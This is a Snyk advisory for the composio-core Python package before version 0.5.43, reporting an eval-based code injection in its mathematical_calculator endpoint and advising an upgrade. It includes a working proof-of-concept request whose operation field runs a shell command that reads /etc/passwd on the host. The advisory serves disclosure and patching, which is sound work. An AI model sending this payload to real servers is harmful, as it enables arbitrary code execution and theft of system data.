Dynamic Variable Evaluation Affecting composio-core package, versions [,0.5.43)


Severity

high (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity
Proof of Concept

  • Snyk ID: SNYK-PYTHON-COMPOSIOCORE-9637814
  • Published: 3 Apr 2025
  • Disclosed: 20 Mar 2025
  • Credit: Aditya Singh

Introduced: 20 Mar 2025

CVE-2024-8953
CWE-627

How to fix?

Upgrade composio-core to version 0.5.43 or higher.

Overview

composio-core is a core package that acts as a bridge between the Composio platform and other services.

Affected versions of this package are vulnerable to Dynamic Variable Evaluation through the eval function in the mathematical_calculator endpoint, which evaluates the caller-supplied operation string as Python. An attacker can execute arbitrary code on the host by sending malicious input to that endpoint.

PoC

import requests

url = "http://localhost:8000/api/actions/execute/mathematical_calculator"
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
    "Cookie": "ajs_anonymous_id=736dccdf-3165-49e6-8800-33d3a0699422",
    "Content-Type": "application/json"
}

data = {
    "params": {
        "operation": "__import__('os').system('cat /etc/passwd > /tmp/testing.txt')"
    }
}

response = requests.post(url, json=data, headers=headers)

print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")
